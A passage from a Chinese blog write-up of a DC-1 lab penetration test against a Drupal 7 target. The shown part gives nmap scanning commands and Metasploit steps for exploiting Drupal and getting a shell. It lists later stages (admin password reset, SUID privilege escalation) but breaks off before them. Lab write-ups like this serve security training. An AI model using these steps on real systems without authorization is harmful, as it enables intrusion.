DC-1 靶机渗透测试(拿shell,提权)

渗透攻击实战:Drupal7漏洞利用与权限提升
本文记录了一次渗透攻击过程,从环境侦查、信息收集到利用Drupal7漏洞获取shell,修改管理员密码,最终通过SUID提权获取flag。涉及的技术包括nmap扫描、MSFconsole工具、Drupal漏洞利用、MySQL操作及权限管理。

目录

一. 环境

二. 信息收集

1. 主机发现

2.访问 192.168.1.184:80

三. 利用msfconsole 攻击(拿到flag1)

1. 漏洞利用成功

2. 进入会话 ,拿到flag1.txt  ---shell

​ 四. 找到配置文件,获取flag2

 五. 修改管理员密码,登录网站,拿到flag3

1. 获取交互式shell, 执行MySQL语句

 2. 查看管理员用户

 3. 修改管理员密码

 六. 用find语句,找到flag4

七. SUID提权,获取最后的flag


一. 环境

靶机:192.168.1.184

攻击机kali:192.168.1.98

(l网络配置都是NAT模式)

----开始---渗透

二. 信息收集

1. 主机发现

1. nmap -sP 192.168.1.0/24  或  arp-scan -l    #识别目标主机

2. nmap -sn 192.168.1.0/24 或者 nmap -sP 192.168.1.0/24  #主机发现/主机探测 

3. nmap -sS -A -p- 192.168.1.184  #识别目标主机服务,端口

  -A 全面系统检测、启用脚本检测、扫描等
  -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限

发现了靶机IP 192.168.1.184 及 80端口开放 

2.访问 192.168.1.184:80

发现网站是Drupal(CMS+PHP)搭建的,使用的是Drupal 7版本

三. 利用msfconsole 攻击(拿到flag1)

1. 漏洞利用成功

1. search drupal  #查找drupal的漏洞

2. use 2     #利用第2个龙洞

3. show options   #显示详情

4. set rhosts 192.168.1.184 # 设置靶机地址

5. run 或 exploit  # 开始攻击

  攻击成功后

6. pwd   # 查看当前路径

2. 进入会话 ,拿到flag1.txt  ---shell

评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值